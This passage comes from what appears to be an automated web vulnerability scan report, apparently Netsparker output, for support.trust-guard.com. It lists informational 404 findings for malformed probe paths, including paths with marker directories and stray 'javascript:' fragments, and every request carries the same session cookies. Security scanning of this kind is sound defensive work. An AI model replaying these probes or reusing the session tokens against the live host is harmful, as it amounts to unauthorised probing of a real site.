
Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:20 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.32. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/

Request

GET /%22https:/support.trust-guard.com/themes/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:33 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.33. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/Netsparker989ee7b1e5714d6487062ac2beb92c5e/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/Netsparker989ee7b1e5714d6487062ac2beb92c5e/

Request

GET /%22https:/support.trust-guard.com/themes/Netsparker989ee7b1e5714d6487062ac2beb92c5e/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:01 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.34. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:20 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.35. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/Netsparker171fc6625a724216905fe5cbc90dc039/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/Netsparker171fc6625a724216905fe5cbc90dc039/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/Netsparker171fc6625a724216905fe5cbc90dc039/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:56 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.36. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/space.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/space.gif/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/space.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/space.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:01:45 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.37. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparkerd02156ea79d8460cbd99c4a2c423a280/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparkerd02156ea79d8460cbd99c4a2c423a280/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparkerd02156ea79d8460cbd99c4a2c423a280/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:02:00 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.38. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:33 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.39. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparkerb5f88b4d125541c1b6a10fa812588f31/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparkerb5f88b4d125541c1b6a10fa812588f31/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparkerb5f88b4d125541c1b6a10fa812588f31/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.40. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:51 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.41. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerdbbf26825bc94fb88869079b322db61d/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerdbbf26825bc94fb88869079b322db61d/

Request

GET /%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerdbbf26825bc94fb88869079b322db61d/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.42. https://support.trust-guard.com/%22javascript:closeProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:closeProactiveRequest_vvx8pjmw()

Request

GET /%22javascript:closeProactiveRequest_vvx8pjmw();/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:closeProactiveRequest_vvx8pjmw();/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:02:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.43. https://support.trust-guard.com/%22javascript:doProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:doProactiveRequest_vvx8pjmw()

Request

GET /%22javascript:doProactiveRequest_vvx8pjmw();/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:doProactiveRequest_vvx8pjmw();/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:02:22 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.44. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:startChat_vvx8pjmw(/

Request

GET /%22javascript:startChat_vvx8pjmw(/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:32 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.45. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:startChat_vvx8pjmw(/'0/

Request

GET /%22javascript:startChat_vvx8pjmw(/'0/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:23 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.46. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:startChat_vvx8pjmw(/'0/')

Request

GET /%22javascript:startChat_vvx8pjmw(/'0/');/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:19 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.47. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/Netsparkerd7012d9eae0e491ab28cbfdcfab04fa1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:startChat_vvx8pjmw(/'0/Netsparkerd7012d9eae0e491ab28cbfdcfab04fa1/

Request

GET /%22javascript:startChat_vvx8pjmw(/'0/Netsparkerd7012d9eae0e491ab28cbfdcfab04fa1/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:32 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.48. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/Netsparker23ea8f008f4c48068c84ca90dd9264b0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:startChat_vvx8pjmw(/Netsparker23ea8f008f4c48068c84ca90dd9264b0/

Request

GET /%22javascript:startChat_vvx8pjmw(/Netsparker23ea8f008f4c48068c84ca90dd9264b0/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

